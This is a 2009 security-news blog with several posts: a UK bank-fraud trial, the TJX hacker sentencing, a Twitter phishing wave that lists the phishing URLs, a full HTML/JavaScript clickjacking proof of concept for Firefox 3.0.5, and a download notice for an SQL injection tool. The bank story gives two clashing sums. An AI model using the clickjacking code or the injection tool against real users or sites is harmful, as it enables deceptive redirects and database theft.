Jan 24 2009

British Hackers Gang Tried To Steal £229m From Japanese Bank In High-Tech Scam

A six-strong hacker gang attempted to plunder £229million from a Japanese bank in an audacious high-tech scam, a court heard.

A crooked security guard at Japanese bank Sumitomo Mitsui let alleged computer hackers into the building in the dead of night where they installed spy software on computers used for multi-million pound cash transfers, the jury was told.

Days later the gang returned to harvest user names and passwords that staff had typed in, it was claimed.

In the early hours of the morning they used the data to try and transfer hundreds of millions of pounds from the bank’s customers to specially set up accounts across the world, the court was told.

The gang attempted to plunder the accounts of customers including Toshiba International, Nomura Asset Management, Mitsui OSK Lines and Sumitomo Chemicals and send millions of pounds to their accounts in Spain, Dubai, Honk Kong and Singapore, Snarebook Crown Court was told.

But the giant scam failed after the gang typed the wrong numbers into the cash transfer forms.
By this time police had already begun watching the alleged crooks.
The security guard Kevin O’Donoghue, 33, from Birmingham and the computer hackers Gille Poelvoorde, 34, from Belgium and Jan Van Osselaer, 32, also from Belgium have already pleaded guilty to conspiracy to steal from the bank.

Today their alleged co-conspirators Hugh Rodley, 61, from Gloucestershire, David Nash, 47, from West Sussex and Inger Malmros, 58, from Sweden appeared charged with setting up the bank accounts
that the funds were going to be diverted to.

The jury heard that another two defendants died shortly before the trial.
Simon Farrell QC, prosecuting, said: ‘The case concerns a dishonest, bold and sophisticated attempt in October 2004 to steal £229,000 from the Sumitomo Mitsui Banking Corporation in the City of London.

‘The attempt was made by surreptitiously entering the bank at night, by corrupting its computer system and by attempting to electronically transfer the money.’

Mr Farrell claimed the gang were let in on several visits at night during September and the beginning of October 2004.
He said: ‘The plan involved the secret uploading of key logger software onto a number of the bank’s computers.
‘This software has the effect of logging the activities carried out by staff including log on names and passwords.
‘What the conspirators did was when they went into the bank they could retrieve the information stored on the computers.
‘Late in the evening of Friday October 1 2004 at about 11.30pm Van Osselaer and Poelvoorde with O’Donoghue entered the bank and were there until 4.30am during which time they accessed computers used for Swift [bank to bank cash transfer] instructions.
‘Having gained access to these computers Poelvoorde and Van Osselaer utilised information obtained from the software to compile ten swift messages instructing the transfer of money around the world.

‘Fortunately for the bank the transfers failed to go through because one of the field codes was incorrect.’
Mr Farrell claimed they returned the next day to attempt a further 11 transfers which failed for the same reason.

They tried to send 10million euros from Toshiba Intrernational’s account to one of their accounts in Dubai. They attempted to plunder 6.9million euros from the Nomura account, attempting to send it to Spain, it was claimed.

He alleged Nash, Malmros and Rodley, who is also known as Lord Rodley after buying a title, ‘were closely linked to the accounts that were to receive stolen funds.

‘All were involved in setting up and controlling a significant number.’
Mr Farrell said Rodley had coordinated receiving the cash adding he was ‘using others to front what he really is in charge of.’
He described O’Donoghue as the ‘inside man’ who tampered with CCTV records to try and erase video of the defendants at the bank.

When a colleague became suspicious about the comings and goings O’Donoghue apparently said that the alleged criminals were ‘friends and played poker at night.’

The trio deny conspiring to defraud the bank and conspiracy to transfer criminal property.

The case continues.

Source : DailyMail
http://tinyurl.com/ceynd5

Jan 22 2009

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking

Firefox 3.0.5 Status Bar Obfuscation / Clickjacking
===========================================

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.milw0rm.com’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<center>
<br>
<font style=”font-family:arial;font-size:32px”>Status Bar Obfuscation
/ Clickjacking</font><br>
<font style=”font-family:arial;font-size:24px”>By MrDoug</font><br>
<br>
<hr size=”3″ width=”500″ color=”#000000″>
<br>
<font style=”font-family:arial;font-size:20px”>Click the VALID link to
google below to visit milw0rm.com</font><br>
<br>
<a href=”http://www.google.com” onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://www.google.com</font></a><br>
<br>
<hr size=”3″ width=”500″ color=”#000000″>
<br>
<font style=”font-family:arial;font-size:16px”>Greetz to Slappywag</font><br>
</center>
<div style=”position:absolute;bottom:0;”>
<font style=”font-family:arial;font-size:32px”>Note this…<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>

===========================================
MrDoug
mrdoug13[at]gmail[dot]com

# milw0rm.com [2009-01-21]

Jan 11 2009

TJX Maxx Hacker Jailed for 30 years

Yastremskiy – or ‘Maksik’ as he was sometimes identified – was one of 11 people eventually arrested at the request of the US Department of Justice, with the Ukrainian reportedly being apprehended in undignified fashion outside a Turkish nightclub in 2008.

Yastremskiy’s part in the crime was allegedly to have purchased credit card numbers stolen during the huge crime, providing the gang with an economic hub for its activities. Other members of the gang hailed from Estonia, Belarus, China, and several parts of the US itself, underlining the global nature of modern electronic crime.

Although not the perpetrator of the hack itself, Yastremskiy would have been essential to its success. He is reported to have been suspected of being behind other crimes not related to the TJX Maxx affair.

The TJX hack will go down as the first major disclosed commercial hack in history, after US-based hackers were able to ‘wardrive’ their way into a poorly-protected Wi-Fi system used for point-of-sale traffic. Forty-five million customer credit cards were said to have been exposed, leaving parent company. TJX Maxx, owning up to potential liabilities of at least $118 million.

Security vendors queued up to declare their satisfaction at the sentence. “Yastremskiy will certainly have plenty of time to ponder whether his hacking activities were worthwhile,” commented Graham Cluley of Sophos.

“The length of this jail time should also make others engaged in cybercrime think again,” he said. “It may seem like the chances of being caught are small, but there are more and more convictions happening all the time, and the authorities are getting better than ever at co-operating at an international level to catch the bad guys.”

Source : NetworkWorld
http://tinyurl.com/8dmfuo

Jan 06 2009

Phishing Attacks Hits Twitter Users – Utilising Direct Messages

There has been a phishing scheme running around on Twitter this weekend.
But, so far, it’s a relatively easy one to avoid becoming a victim of.
Here are some tips on the phishing mess.

First, it is okay to check your DMs on Twitter.
You don’t need to be afraid to check them. But, be careful about any links in messages from others, even if you know them.
You won’t be affected by the scam just by reading your DMs.

For people using OpenDNS or Firefox 3, it appears that both of those are now blocking the phishing site. But, still be careful out there.

The short of it is that you should be careful, but don’t become irrational over the phishing attack.

Here are the known URLs of the phishing attack:

http://jannawalitax.blogspot.com/

http://twitterblog.access-logins.com/login

http://rosalierebyb.blogspot.com/

Source : dcr Blogs
http://www.dcrblogs.com/2009/01/04/twitter-phishing/

Jan 06 2009

WITOOL – Web SQL Injection Tool

WiTool

WITOOL is SQL injection tool by .NET (2.0).

- For SQL Server, Oracle
- Error Base and Union Base

Features :
* Retrieve schema : DB/TableSpace, Table, Column, other object
* Retrieve data : retrive paging, dump xml file
* Log : View the raw data HTTP log

Environment :
OS: Windows 2000/XP/VISTA
Requirement: Microsoft .NET(2.0) Library

Download :
http://witool.sourceforge.net/